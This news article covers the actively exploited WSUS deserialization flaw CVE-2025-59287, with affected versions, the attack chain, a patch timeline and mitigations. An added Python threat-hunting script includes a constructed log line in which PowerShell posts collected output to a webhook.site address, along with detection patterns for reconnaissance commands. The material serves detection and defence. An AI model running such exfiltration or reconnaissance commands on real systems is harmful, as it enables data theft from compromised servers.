Critical WSUS RCE Vulnerability CVE-2025-59287 Actively Exploited, CISA Urges Immediate Patching

A critical, unauthenticated Remote Code Execution (RCE) vulnerability, CVE-2025-59287, in Microsoft’s Windows Server Update Services (WSUS) is being actively exploited right now, allowing attackers to run malicious code with SYSTEM privileges. Security researchers like Unit 42 spotted the attacks within hours of Microsoft’s emergency patch release, and CISA has already added it to its Known Exploited Vulnerabilities (KEV) Catalog, urging immediate action for all affected Windows Server versions.

Microsoft’s Windows Server Update Services (WSUS) just got hit with a critical, unauthenticated Remote Code Execution (RCE) vulnerability, tracked as CVE-2025-59287. This isn’t just another bug; it’s a gaping hole that lets attackers execute arbitrary code with SYSTEM privileges on affected servers—no login needed. The CVSS v3.1 score of 9.8 (CRITICAL) from Microsoft Corporation tells you everything you need to know about the severity. What really sets this apart? Active exploitation was seen in the wild by Unit 42 almost immediately after an emergency patch dropped. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) wasted no time, adding this CVE to its Known Exploited Vulnerabilities (KEV) Catalog on October 24, 2025. That move alone signals extreme urgency.

The Critical WSUS Vulnerability: CVE-2025-59287 Explained

The heart of CVE-2025-59287 is an unsafe deserialization of untrusted data within the WSUS component. Think of it like this: the server is told to read and process some data, but it trusts that data too much, executing whatever it’s given without proper checks.

Researchers at HawkTrace detailed exactly how this plays out. It happens when AuthorizationCookie objects are sent to the GetCookie() endpoint. The problem? Encrypted cookie data gets decrypted using AES-128-CBC and then—crucially—deserialized via BinaryFormatter without the necessary type validation. This means an attacker can slip in malicious code inside what looks like normal cookie data, and the server just runs it. Unit 42 also flagged another way attackers are getting in: targeting the ReportingWebService to trigger unsafe deserialization, but this time using SoapFormatter. Either way, it’s a direct path for a remote, unauthenticated attacker to run malicious code with SYSTEM privileges.

Specifically, the DecryptData method in Microsoft.UpdateServices.Internal.Authorization.EncryptionHelper is the weak link. If the decrypted data isn’t UnencryptedCookieData, it’s fed straight into BinaryFormatter.Deserialize(). No adequate type checks. Nothing to stop arbitrary encrypted payloads from being deserialized and executed. It’s a fundamental security breakdown.

This vulnerability impacts a wide range of Microsoft Windows Server versions, specifically any server with the WSUS Server Role enabled:

  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016 (up to, excluding 10.0.14393.8524)
  • Microsoft Windows Server 2019 (up to, excluding 10.0.17763.7922)
  • Microsoft Windows Server 2022 (up to, excluding 10.0.20348.4297)
  • Microsoft Windows Server 2022 23H2 Edition (up to, excluding 10.0.25398.1916)
  • Microsoft Windows Server 2025 (up to, excluding 10.0.26100.6905)

Active Exploitation and Its Damaging Reach

CVE-2025-59287 isn’t theoretical; it’s a live threat right now. This unauthenticated RCE, paired with SYSTEM privileges in a ubiquitous enterprise service, is a dream for attackers and a nightmare for organizations. Compromising a WSUS server isn’t just about one machine; it’s a strategic entry point, giving attackers a prime position for lateral movement and potentially taking over an entire network, as Unit 42 analysts pointed out.

Unit 42’s boots-on-the-ground analysis of observed attacks paints a clear picture: attackers are homing in on publicly exposed WSUS instances, usually on default TCP ports 8530 (HTTP) and 8531 (HTTPS). They’re executing malicious PowerShell commands, often as child processes of wsusservice.exe or w3wp.exe, which then launch cmd.exe and powershell.exe. The initial goal is pure reconnaissance: whoami, net user /domain, ipconfig /all. They want to map the network, identify high-value accounts, and understand the domain structure. Once they have that intel, it’s quickly exfiltrated to attacker-controlled Webhook.site endpoints using more PowerShell.
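The process-chain indicators described above, turned into a small hunting script as an added example (it is not code from the article, HawkTrace or Unit 42). It runs over constructed process-creation records; the `Key=Value|Key=Value` record format, the field names and the host names are assumptions, and the sample log lines are made up to mirror the chain the article reports.

```python
import re

# Parent processes Unit 42 names as the origin of the malicious shells, and the
# shells themselves. w3wp.exe hosts every IIS app pool, so in production scope
# this further (for example to the WSUS application pool's worker process).
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Recon commands observed after exploitation, and the exfiltration destination.
RECON_PATTERNS = [re.compile(p, re.I) for p in
                  (r"\bwhoami\b", r"\bnet\s+user\s+/domain\b", r"\bipconfig\s+/all\b")]
EXFIL_PATTERN = re.compile(r"webhook\.site", re.I)

def parse_event(line: str) -> dict[str, str]:
    """Parse one 'Key=Value|Key=Value' process-creation record into a dict."""
    return dict(f.split("=", 1) for f in line.split("|") if "=" in f)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (last backslash-separated part)."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: dict[str, str]) -> list[str]:
    """Return the detection tags that fire on one event (empty if none do)."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    tags = []
    if parent in WSUS_PARENTS and child in SHELLS:
        tags.append("wsus_spawned_shell")   # the post-exploitation chain itself
    if child in SHELLS and any(p.search(cmd) for p in RECON_PATTERNS):
        tags.append("recon")                # whoami / net user /domain / ipconfig /all
    if EXFIL_PATTERN.search(cmd):
        tags.append("exfil")                # results posted to a Webhook.site endpoint
    return tags

def hunt(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Run classify() over raw log lines; return (host, image, tags) for hits only."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        tags = classify(ev)
        if tags:
            hits.append((ev.get("Host", "?"), basename(ev.get("Image", "")), tags))
    return hits

# Constructed sample telemetry (not real logs), modelled on the chain the article describes.
SAMPLE_LOG = [
    r"Host=wsus01|ParentImage=C:\Program Files\Update Services\Service\wsusservice.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c whoami",
    r"Host=wsus01|ParentImage=C:\Windows\System32\inetsrv\w3wp.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -nop -c net user /domain",
    r"Host=wsus01|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe Invoke-WebRequest -Uri https://webhook.site/constructed-id -Method POST -Body $out",
    r"Host=fs02|ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe Get-Service",
]
```

`hunt(SAMPLE_LOG)` flags the first three records and ignores the benign PowerShell launched from Explorer; in a real environment, feed it Sysmon Event ID 1 or Security 4688 records mapped to the same field names.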

Palo Alto Networks’ Cortex Xpanse found roughly 5,500 WSUS instances exposed to the internet. That’s a massive global attack surface. Unit 42 rightly stresses that exposing an internal-facing service like WSUS to the public internet isn’t just a mistake; it’s a critical misconfiguration. It transforms a localized server vulnerability into a potential enterprise-wide disaster, a supply-chain compromise waiting to happen.

What to Do Now: Patches and Urgent Recommendations

The timeline for this vulnerability is brutal:

  • October 14, 2025: The NVD entry for CVE-2025-59287 went live. Microsoft released an initial patch during its October Patch Tuesday.
  • October 23, 2025: That first patch didn’t quite cut it. Microsoft had to release an emergency out-of-band security update.
  • October 23, 2025 (within hours of patch): Barely a moment after the emergency patch, Unit 42 and other researchers saw active exploitation.
  • October 24, 2025: CISA slapped CVE-2025-59287 onto its Known Exploited Vulnerabilities (KEV) Catalog.
  • October 28, 2025: NVD record for CVE-2025-59287 last modified.

Microsoft Corporation, as the CVE Numbering Authority, first disclosed the vulnerability and quickly pushed out patches. HawkTrace provided the deep technical dive, complete with a Proof-of-Concept, breaking down the unsafe deserialization flaw. Unit 42 (Palo Alto Networks) has been critical in monitoring and reporting the active exploitation, offering crucial analysis of attack methods. And CISA’s KEV Catalog addition underscores just how serious this threat is.

Given that this vulnerability is being actively exploited right now, organizations absolutely must apply the latest security updates from Microsoft to all affected WSUS servers. Immediately. If you can’t patch instantly, at least get some interim mitigations in place: disable the WSUS server role if possible, or block the high-risk ports (like 8530 and 8531) associated with WSUS. Experts can’t stress this enough: strong network segmentation is vital. It’s the kind of basic cyber hygiene that keeps a single server vulnerability from bringing down an entire company. For those with Palo Alto Networks security products, Unit 42 has already provided protective measures and threat hunting queries to detect and prevent exploitation.